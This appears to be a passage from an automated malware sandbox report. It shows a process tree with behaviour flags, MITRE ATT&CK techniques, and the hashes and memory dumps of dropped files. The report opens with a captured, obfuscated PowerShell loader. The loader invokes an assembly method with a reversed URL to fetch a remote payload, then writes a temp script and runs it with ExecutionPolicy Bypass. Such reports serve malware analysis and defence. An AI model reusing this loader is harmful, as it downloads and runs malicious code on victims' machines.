'[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$wTeJN += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$wTeJN += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.pxx/gro.airadapu//:sptth'' , $sNwoM , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$wTeJN | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
    3⤵
    - Blocklisted process makes network request
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2000
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe JCCGX /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2832
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" JCCGX /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2584
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2180

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7fa5b244e6c627d92156a24f6752c99a

SHA1
fa31eb626e5f29655f950ac9aa10f88cce27992a

SHA256
50e61d66769bc310200be1f17d4a6f85fe200ae18a1067489c99b5499af3cd87

SHA512
77fac54da10b4b8f25471250d4fbdb53361d41b3e060eb9308800e87279167838bf6220bdc8d467a4b53f0f7d950fefe5b6a82b031de68752f53f2f6b0b90056

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2b3efd47c9d2668a90e28b06f0484126

SHA1
fe72705192fa09174ae97b12ea21db140656a1a9

SHA256
77433c8df8992f10a473475a4aa832d2cd8ddd3c57f52394ca2e69bd2fae10e1

SHA512
d2728608a4d74af62ef48208a11a1a06028e58c951a61ba1b5f197d4ad498c7c1e63f4b61ac68eeb385bcd7a53dd22f82e5dbd3222efb8c061b37a52baaf4591

Download Submit
memory/2472-4-0x000007FEF638E000-0x000007FEF638F000-memory.dmp

Filesize
4KB

Download
memory/2472-5-0x000000001B690000-0x000000001B972000-memory.dmp

Filesize
2.9MB

Download
memory/2472-6-0x0000000002380000-0x0000000002388000-memory.dmp

Filesize
32KB

Download
memory/2472-7-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

Filesize
9.6MB

Download
memory/2472-8-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

Filesize
9.6MB

Download
memory/2472-9-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

Filesize
9.6MB

Download
memory/2472-10-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

Filesize
9.6MB

Download
memory/2472-16-0x000007FEF638E000-0x000007FEF638F000-memory.dmp

Filesize
4KB

Download
memory/2472-17-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing